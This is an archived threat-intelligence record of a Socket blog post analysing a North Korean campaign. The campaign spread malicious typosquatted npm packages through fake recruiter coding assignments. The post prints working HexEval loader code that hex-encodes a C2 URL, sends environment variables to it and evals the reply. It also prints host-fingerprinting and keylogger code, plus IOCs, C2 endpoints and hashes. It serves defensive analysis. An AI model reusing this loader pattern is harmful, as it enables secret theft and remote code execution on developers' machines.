{
	"id": "ed8322a1-8c63-4ea3-aeaa-48ec33b9e18a",
	"created_at": "2026-04-06T00:19:13.259946Z",
	"updated_at": "2026-04-10T13:11:37.260686Z",
	"deleted_at": null,
	"sha1_hash": "cb28625bd1f0ca0e3931f170193e91d1d1472b3c",
	"title": "Another Wave: North Korean Contagious Interview Campaign Dro...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3666881,
	"plain_text": "Another Wave: North Korean Contagious Interview Campaign\r\nDro...\r\nArchived: 2026-04-05 17:53:08 UTC\r\nThe Socket Threat Research Team has uncovered an extended and ongoing North Korean supply chain attack that\r\nhides behind typosquatted npm packages. Threat actors linked to the Contagious Interview operation published 35\r\nmalicious packages across 24 npm accounts. Six remain live on the registry ( react-plaid-sdk , sumsub-node-websdk , vite-plugin-next-refresh , vite-loader-svg , node-orm-mongoose , and router-parse ), and\r\nhttps://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages\r\nPage 1 of 12\n\ntogether have been downloaded over 4,000 times. We have petitioned the npm security team to remove the\r\nremaining live packages and suspend the associated accounts.\r\nEach malicious package contains a hex-encoded loader we call HexEval. When the package installs, HexEval\r\nLoader collects host metadata, decodes its follow-on script, and, when triggered, fetches and runs BeaverTail, the\r\ninfostealing second-stage malware linked to the Democratic People’s Republic of Korea (DPRK) attackers.\r\nBeaverTail, in turn, references a third-stage backdoor InvisibleFerret, giving the threat actors layered control over\r\nthe victim’s machine. This nesting-doll structure helps the campaign evade basic static scanners and manual\r\nreviews. 
One npm alias also shipped a cross-platform keylogger package that captures every keystroke, showing\r\nthe threat actors’ readiness to tailor payloads for deeper surveillance when the target warrants it.\r\nPosing as recruiters on LinkedIn, the North Korean threat actors send coding “assignments” to developers and job\r\nseekers via Google Docs, embed these malicious packages within the project, and often pressure candidates to run\r\nthe code outside containerized environments while screen-sharing.\r\nEarlier campaigns embedded obfuscated BeaverTail directly in packages. Once security researchers exposed that\r\ntactic, the threat group pivoted to HexEval Loader, which fetches BeaverTail on demand and leaves minimal\r\nevidence in the registry. We first documented this shift in April 2025, when the npm account crouch626\r\npublished four malicious modules ( cln-logger , node-clog , consolidate-log , and consolidate-logger ).\r\nThe first two carried a HexEval Loader, whereas the others concealed an obfuscated copy of BeaverTail malware.\r\nSince then we have tracked dozens more packages, and believe the true count is higher because npm removed\r\nseveral shortly after publication. The campaign is still active, and we expect additional malicious packages to\r\nsurface.\r\nDiamond model of intrusion analysis overview of the HexEval Loader campaign, linking North Korean\r\nContagious Interview threat actors ( Adversary ) to their C2 servers, npm accounts, and fake recruiter\r\nprofiles ( Infrastructure ), the HexEval Loader, BeaverTail, InvisibleFerret, and a keylogger\r\n( Capabilities ), and the targeted job-seekers and developers approached on LinkedIn ( Victim ).\r\nAnatomy of a HexEval Loader#\r\nThe threat actors follow a consistent naming and typosquatting playbook. 
They reuse well-known patterns such as\r\nvite-plugin-* , react-* , *-logger , json* , and typosquat popular projects, for example reactbootstraps\r\nmasquerades as react-bootstrap and react-plaid-sdk echoes the legitimate react-plaid-link . Behind the\r\nfamiliar branding sits a compact malware loader (HexEval) that appears harmless on cursory review. The\r\nfollowing excerpt from serverlog-dispatch illustrates the typical HexEval Loader pattern:\r\n// Decode a hex-encoded string at run time\r\nfunction g(h) {\r\n return h.replace(/../g, m =\u003e String.fromCharCode(parseInt(m, 16)));\r\n}\r\nconst hl = [\r\n g('72657175697265'), // require\r\n g('6178696f73'), // axios\r\n g('706f7374'), // post\r\n g('687474703a2f2f69702d636865636b2d7365727665722e76657263656c2e6170702f6170692f69702d636865636b2f323038'),\r\n // C2 endpoint:\r\n // hxxp://ip-check-server[.]vercel[.]app/api/ip-check/208\r\n g('7468656e') // then\r\n];\r\n// Send environment data to the C2 endpoint, receive a script, then execute it\r\nmodule.exports = () =\u003e\r\n require(hl[1])[hl[2]](hl[3], { ...process.env })\r\n [hl[4]](r =\u003e eval(r.data))\r\n .catch(() =\u003e {});\r\nTo evade static analysis, the threat actors encode module names and C2 URLs as hexadecimal strings. The helper\r\nfunction g reverses this obfuscation by converting each two-character hex byte back into its ASCII\r\nrepresentation. Once decoded, the loader issues an HTTPS POST request to its C2 server, retrieves a second-stage\r\npayload, and executes it by calling eval() . The operation in the identified packages alternates among three\r\nhardcoded C2 endpoints: hxxps://log-server-lovat[.]vercel[.]app/api/ipcheck/703 , hxxps://ip-check-server[.]vercel[.]app/api/ip-check/208 , and hxxps://ip-check-api[.]vercel[.]app/api/ipcheck/703 . In at\r\nleast one malicious package cluster, a victim captured and analyzed the returned second-stage payload,\r\nconfirming its malicious behavior. 
However, these endpoints often return only IP geolocation data or undefined ,\r\nsuggesting that the backend selectively serves malicious code based on request headers, execution environment, or\r\nother runtime conditions. This conditional logic complicates detection and raises important questions about how\r\nand when eval(r.data) executes its payload.\r\nSeveral variants, including react-plaid-sdk , embed extra reconnaissance code in addition to the loader\r\nfunctionality, as shown in the following excerpt:\r\n// Host fingerprinting\r\nconst data = {\r\n ...process.env, // Extract environment variables\r\n platform: os.platform(), // Operating system\r\n hostname: os.hostname(), // Machine host name\r\n username: os.userInfo().username, // Current user account\r\n macAddresses: getMacAddress() // MAC address for device fingerprinting\r\n};\r\nThe npm alias jtgleason also published jsonsecs , a package that supplements the HexEval Loader with a\r\ncross-platform keylogger, enabling keystroke capture on Windows, macOS, and Linux systems when the threat\r\nactors require deeper surveillance.\r\nconst os_1 = __importDefault(require(\"os\")); // Node’s OS module\r\nconst MacKeyServer_1 = require(\"./ts/MacKeyServer\"); // macOS keylogger\r\nconst WinKeyServer_1 = require(\"./ts/WinKeyServer\"); // Windows keylogger\r\nconst X11KeyServer_1 = require(\"./ts/X11KeyServer\"); // Linux/Unix keylogger\r\nThe jsonsecs package includes compiled native binaries and exposes platform-specific keyboard hook\r\nfunctionality. 
Based on the operating system, it loads one of three binaries to hook into low-level input events:\r\nWindows: WinKeyServer (SHA256:\r\ne58864cc22cd8ec17ae35dd810455d604aadab7c3f145b6c53b3c261855a4bb1 )\r\nmacOS: MacKeyServer (SHA256:\r\n30043996a56d0f6ad4ddb4186bd09ffc1050dcc352f641ce3907d35174086e15 )\r\nLinux: X11KeyServer (SHA256:\r\n6e09249262d9a605180dfbd0939379bbf9f37db076980d6ffda98d650f70a16d )\r\nThe system allows arbitrary handlers (listeners) to receive keystroke data, enabling exfiltration or real-time\r\nsurveillance by the threat actors.\r\nVictim Profile: Developers and Engineers Seeking Work#\r\nThe loveryon cluster (an npm alias that published serverlog-dispatch , mongo-errorlog , next-log-patcher , and vite-plugin-tools ) exposes a well-orchestrated social-engineering routine that begins on\r\nLinkedIn. The threat actors posed as recruiters and approached software engineers with attractive job offers. After\r\na brief exchange they sent coding tasks that instructed the candidates to clone test repositories and make minor\r\nchanges. Buried in those projects was one of the loveryon cluster malicious dependencies carrying the HexEval\r\nLoader (or an inline eval() snippet) that triggered the moment the code ran.\r\nA Reddit user describes uncovering four malicious npm packages tied to the North Korean Contagious\r\nInterview operation. The threat actors posed as a recruiter on LinkedIn, lured the user into executing\r\ncode locally, and attempted to exfiltrate data. 
Running the assignment in a containerized environment,\r\nthe user captured the second-stage payload delivered by the packages ( next-log-patcher , vite-plugin-tools , mongo-errorlog , and serverlog-dispatch ) and linked infrastructure.\r\nSecond-Stage Payload: BeaverTail Malware#\r\nOnce decoded, the HexEval Loader in the loveryon cluster retrieved a second-stage payload (BeaverTail\r\nmalware) from 172[.]86[.]80[.]145:1224 and executed it using eval() . We have previously analyzed\r\nBeaverTail in depth. In brief, it functions as both an infostealer and a loader, designed for targeted data theft and\r\npersistent access. Upon execution, BeaverTail scans local file systems for browser artifacts across approximately\r\n200 profile directories, including those associated with Brave, Chrome, and Opera. It searches for cookies,\r\nIndexedDB files, and extensions such as .log and .ldb that may contain sensitive data. BeaverTail also targets\r\ncryptocurrency wallets, attempting to extract files like Solana’s id.json , Exodus wallet data, and macOS\r\nkeychain databases. Its behavior dynamically adjusts based on the host operating system (Windows, macOS, or\r\nLinux).\r\nThe version identified in the loveryon cluster also includes logic to retrieve a third-stage backdoor,\r\nInvisibleFerret. Using either curl or the Node.js request module, BeaverTail downloads additional payloads,\r\nsuch as InvisibleFerret, under filenames such as p.zi or p2.zip , which are extracted using tar -xf . This multi-stage deployment mirrors previously observed campaigns tied to North Korean threat actors using the same\r\nmalware family.\r\nThe intrusion begins with social engineering. According to multiple victims’ reports, North Korean threat actors\r\ncreate fake recruiter profiles on LinkedIn to impersonate hiring professionals from recruitment companies. 
They\r\ntarget software engineers who are actively job-hunting, exploiting the trust that job-seekers typically place in\r\nrecruiters. Fake personas initiate contact, often with scripted outreach messages and convincing job descriptions.\r\nThe threat actors used 19 distinct email addresses to register the npm accounts behind the 35 malicious packages\r\nuncovered in this campaign (see IOC section for the full list). Several of these addresses (e.g.\r\nmaria.sam.recruiter@gmail[.]com , toptalent0921@gmail[.]com , and business00747@gmail[.]com ) appear\r\ncrafted to mimic recruiter identities. The threat actors likely created or used these email accounts alongside fake\r\nrecruiter profiles as part of their broader social engineering campaign. By posing as hiring managers or technical\r\nrecruiters, the threat actors exploited job-seeking behavior to build trust and increase the likelihood that targets\r\nwould install and run the malicious code.\r\nAfter initial communication, the threat actors send victims a technical assessment or coding assignment under the\r\nguise of a hiring process. In several cases, once the malicious code is delivered, the fake recruiters delete their\r\nLinkedIn profiles or block the victim, cutting off contact to cover tracks. Victim reports on Reddit consistently\r\ndescribe the same pattern, noting similar job descriptions and identical communication scripts across different\r\nrecruiter personas.\r\nReddit users report coordinated social engineering involving a fake recruiter who directed targets to\r\nclone and run a Bitbucket-hosted project locally. After execution, the recruiter deleted their account.\r\nThe assignments direct victims to clone code repositories or install specific npm packages (both of which deliver\r\nmalicious JavaScript payloads). 
In this campaign, the payload is the HexEval Loader, designed to fingerprint the\r\nhost and retrieve second-stage malware. Once a victim submits the completed assignment, the threat actors often\r\nescalate their tactics. They may request a live video call with a “project manager”, during which they pressure the\r\nvictim to disable Docker or other container environments and run the code natively on their machine while screen\r\nsharing — an attempt to bypass container isolation and ensure full infection.\r\nA threat actor, posing as a recruiter on LinkedIn, pressures the target to bypass containerized\r\nenvironments and execute code directly on the host system.\r\nMultiple victims report this exact sequence. On Reddit, one developer described being asked to “clone it again for\r\na new update and run the app without Docker on a real machine while sharing my screen”. This tactic reflects a\r\ndeliberate effort to ensure execution in a vulnerable context.\r\nVictims are approached with lucrative job offers, often advertising remote roles with salaries ranging from\r\n$16,000 to $25,000 per month ($192,000 to $300,000 per year). 
The job descriptions are shared via Google Docs\r\nor PDFs and are crafted to resemble legitimate listings for positions such as developers, designers, engineers, or\r\nproject managers.\r\nScreenshot of a fraudulent Google Doc job description used by threat actors to lure blockchain\r\ndevelopers with fake remote positions; part of a broader social engineering campaign targeting\r\nsoftware engineers.\r\nScreenshot of a fraudulent coding assignment hosted on Google Docs, instructing blockchain\r\ndevelopers to interact with a Bitbucket repository ( notion-dex/ultrax ) as part of a fake recruitment\r\nprocess.\r\nThe targeting appears to follow prior open source intelligence (OSINT) collection. In several cases, the fake\r\nrecruiters reference specific GitHub projects, past experience, and personal details, suggesting a deliberate effort\r\nto personalize the outreach and boost credibility. Once the victim engages, malicious npm packages are discreetly\r\nintroduced, either embedded in the assignment codebase or added as hidden dependencies. This initiates host\r\nreconnaissance and sets the stage for follow-on intrusions and malware execution.\r\nOutlook and Recommendations#\r\nThis malicious campaign highlights an evolving tradecraft in North Korean supply chain attacks, one that blends\r\nmalware staging, OSINT-driven targeting, and social engineering to compromise developers through trusted\r\necosystems. By embedding malware loaders like HexEval in open source packages and delivering them through\r\nfake job assignments, threat actors sidestep perimeter defenses and gain execution on the systems of targeted\r\ndevelopers. 
The campaign’s multi-stage structure, minimal on-registry footprint, and attempt to evade\r\ncontainerized environments point to a well-resourced adversary refining its intrusion methods in real time.\r\nDefenders should expect continued infiltration of public registries like npm, especially through typosquatting and\r\ndelayed second-stage delivery mechanisms. Given the success of this approach, similar nation-state and criminal\r\nthreat actors may emulate these tactics.\r\nTo defend against sophisticated supply chain attacks like the Contagious Interview campaign, developers and\r\norganizations must adopt proactive security tooling that detects threats before they reach production systems.\r\nTraditional static analysis and package metadata checks are no longer sufficient when attackers weaponize social\r\nengineering and hide malware in seemingly legitimate open source packages.\r\nSocket provides purpose-built defenses to meet these challenges. The Socket GitHub App offers real-time pull\r\nrequest scanning, alerting teams to suspicious or malicious dependencies before they are merged. The Socket CLI\r\nsurfaces red flags during npm install , giving developers immediate insight into the risks of packages\r\nintroduced at the terminal. And the Socket browser extension adds a critical layer of defense by warning users\r\nwhen they visit or download malicious packages from package managers.\r\nIndicators of Compromise (IOCs)#\r\nMalicious npm Packages#\r\n1. react-plaid-sdk\r\n2. sumsub-node-websdk\r\n3. vite-plugin-next-refresh\r\n4. vite-plugin-purify\r\n5. nextjs-insight\r\n6. vite-plugin-svgn\r\n7. node-loggers\r\n8. react-logs\r\n9. reactbootstraps\r\n10. framer-motion-ext\r\n11. serverlog-dispatch\r\n12. mongo-errorlog\r\n13. next-log-patcher\r\n14. vite-plugin-tools\r\n15. pixel-percent\r\n16. test-topdev-logger-v1\r\n17. 
test-topdev-logger-v3\r\n18. server-log-engine\r\n19. logbin-nodejs\r\n20. vite-loader-svg\r\n21. struct-logger\r\n22. flexible-loggers\r\n23. beautiful-plugins\r\n24. chalk-config\r\n25. jsonpacks\r\n26. jsonspecific\r\n27. jsonsecs\r\n28. util-buffers\r\n29. blur-plugins\r\n30. proc-watch\r\n31. node-orm-mongoose\r\n32. prior-config\r\n33. use-videos\r\n34. lucide-node\r\n35. router-parse\r\nThreat Actor Identifiers#\r\nnpm Aliases:\r\n1. liamnevin\r\n2. pablomendes\r\n3. bappda\r\n4. jvinter97\r\n5. eric.c01\r\n6. maryanaaaa\r\n7. npmdev001\r\n8. loveryon\r\n9. supermmm\r\n10. topdev0921\r\n11. hansdev0512\r\n12. abdulrahman_nasser\r\n13. marsinc326\r\n14. cristoper52\r\n15. shauncepla\r\n16. marthamoon014\r\n17. jtgleason\r\n18. grace107\r\n19. business00747\r\n20. supercrazybug\r\n21. alexander0110819\r\n22. purpledev07\r\n23. mariasam\r\n24. oleksandrrozgon\r\nEmail Addresses\r\n1. alexander0110819@outlook[.]com\r\n2. maria.sam.recruiter@gmail[.]com\r\n3. toptalent0921@gmail[.]com\r\n4. business00747@gmail[.]com\r\n5. eric.c01.recruit@gmail[.]com\r\n6. hiring.dev.hr@gmail[.]com\r\n7. carrie.bale.recruit@gmail[.]com\r\n8. emilyjobs.rec2023@gmail[.]com\r\n9. mars.recruiting.hiring@gmail[.]com\r\n10. shauncepla.hrteam@gmail[.]com\r\n11. grace.chen.recruitment@gmail[.]com\r\n12. grace107jobs@gmail[.]com\r\n13. abdulrahman.nasser.hr@gmail[.]com\r\n14. marthamoon014@gmail[.]com\r\n15. sofia.helman@outlook[.]com\r\n16. supercrazybug.team@gmail[.]com\r\n17. maryanaaaa.hrteam@gmail[.]com\r\n18. topdev0921@gmail[.]com\r\n19. 
natalie.dev.hr@gmail[.]com\r\nMalicious Bitbucket Repositories#\r\nhxxps://bitbucket[.]org/notion-dex/ultrax\r\nhxxps://bitbucket[.]org/zoro-workspace/\r\nCommand and Control (C2) Endpoints#\r\nhxxps://log-server-lovat[.]vercel[.]app/api/ipcheck/703\r\nhxxps://ip-check-server[.]vercel[.]app/api/ip-check/208\r\nhxxps://ip-check-api[.]vercel[.]app/api/ipcheck/703\r\n172[.]86[.]80[.]145\r\nSHA256 Hashes#\r\ne58864cc22cd8ec17ae35dd810455d604aadab7c3f145b6c53b3c261855a4bb1 — WinKeyServer\r\n30043996a56d0f6ad4ddb4186bd09ffc1050dcc352f641ce3907d35174086e15 — MacKeyServer\r\n6e09249262d9a605180dfbd0939379bbf9f37db076980d6ffda98d650f70a16d — X11KeyServer\r\nMITRE ATT\u0026CK Techniques#\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1056.001 — Input Capture: Keylogging\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages"
	],
	"report_names": [
		"north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434753,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cb28625bd1f0ca0e3931f170193e91d1d1472b3c.pdf",
		"text": "https://archive.orkl.eu/cb28625bd1f0ca0e3931f170193e91d1d1472b3c.txt",
		"img": "https://archive.orkl.eu/cb28625bd1f0ca0e3931f170193e91d1d1472b3c.jpg"
	}
}